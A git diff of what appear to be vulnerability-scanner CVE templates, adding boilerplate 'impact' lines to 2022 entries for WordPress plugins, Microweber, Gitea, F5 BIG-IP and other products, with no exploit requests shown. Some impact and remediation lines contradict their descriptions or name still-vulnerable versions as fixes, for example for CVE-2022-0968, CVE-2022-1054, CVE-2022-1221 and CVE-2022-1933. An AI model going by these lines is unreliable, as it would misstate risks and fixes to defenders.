+ impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue. reference: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 9c924a9b54..aab74740aa 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index be64187d50..421e766e9a 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or denial of service. remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. reference: - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 63fbe08423..d87307246d 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the user. remediation: | Update to WordPress Advanced Booking Calendar plugin version 1.7.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 0cd5365e21..8cb791d66d 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Personal Dictionary plugin before 1.3.4 contains a blind SQL injection vulnerability. The plugin fails to properly sanitize user-supplied POST data before being interpolated in an SQL statement and executed. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 1.3.4. reference: - https://wpscan.com/vulnerability/eed70659-9e3e-42a2-b427-56c52e0fbc0d diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index dbd5af8cad..1d96bca45c 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml 
@@ -5,6 +5,8 @@ info: author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. + impact: | + It allows remote code execution on the affected system. remediation: | Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 21d5d1cbc3..34e821c0f7 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall. remediation: | Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index db1727b202..8d5fe3be53 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml 
@@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events, + impact: | + An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events. remediation: | Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. reference: diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 8a3f9e0e6b..35da0cd6ab 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 65268c52ea..a07329c66d 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 1af71e5270..bab829d586 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 75f563dbea..19db4031a5 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml 
@@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE contains a hard-coded credentials vulnerability. A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML), allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Affected versions are 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions within the GitLab application. remediation: Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the reference section below. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 30cecbc7fc..ab08023a1f 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index d6b32bb527..3c6cabfda9 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version 3.6.3 reference: - https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/ diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index a7fddb3f84..b51f3b8212 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch. reference: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index e0273b3225..b1db92e50f 100644 
--- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by F5 Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index b63c6b5bb5..b072b67470 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 551b816e81..f47769a5ba 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information. remediation: | Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 3e4bf5c3a2..40ff9593af 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 1ab74a1b0b..9322c5fcb7 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress External Media without Import plugin through 1.1.2 is susceptible to authenticated blind server-side request forgery. The plugin has no authorization and does not ensure that media added via URLs are external media, which can allow any authenticated users, including subscribers, to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions, access internal resources, and potentially perform further attacks. remediation: | Upgrade to External Media without Import plugin version 1.1.2 or later. reference: diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index bc83c444d0..8f158b6f12 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 2083cd5643..4de6af78dc 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the Metform plugin (>=2.1.4) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index a43451a65f..62a93c562e 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server. + impact: | + An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access. remediation: | Update to the latest version of the plugin or remove it if not needed. reference: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 4c36fb577a..7083fac409 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 74b9c4a67b..3b37020e18 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site. + impact: | + This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions. remediation: | Update the WPQA plugin to version 5.5 or later to fix the improper access control issue. reference: diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 3a9ad551ce..fee93d9e6c 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml 
@@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index a8e0c7fafa..76fbcbfcd9 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage. remediation: | Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index d3afaecb08..c0e1667403 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml 
@@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 74faa9bf0c..2af1e896af 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: Fixed in version 7.4.5 reference: - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072 diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 90b7b34835..83d50300ee 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index a57d06af93..d38265ece4 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index b4d3bfca51..9784d6d3e2 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 35cedcdb7e..b0e3ad959e 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username. + impact: | + An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system. remediation: Fixed in version 3.4.8 reference: - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08 diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index b687e89862..6ae4668646 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index a4e754dfac..c09c9399a1 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. reference: diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 672da1aead..2d40df8a8d 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Shortcodes and Extra Features for Phlox plugin (2.9.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index d24d3ae0b7..98a89eb0ff 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index d8ff658180..efcf5ad171 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade WordPress to version 5.1.9 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 2d61c9ade9..91f606aa40 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 175bc08c6b..06ce7798c3 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Gallery plugin to version 2.0.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 38b9311924..a3a04b98be 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site. remediation: | Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index cf97ee1853..0e167d6fd3 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -5,6 +5,8 @@ info: author: paradessia,narluin severity: high description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + impact: | + An attacker can read sensitive files containing credentials, configuration details, or other sensitive information. remediation: | Apply the latest security patches provided by Oracle to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 5de3aa4d3a..ec40db3ae6 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml 
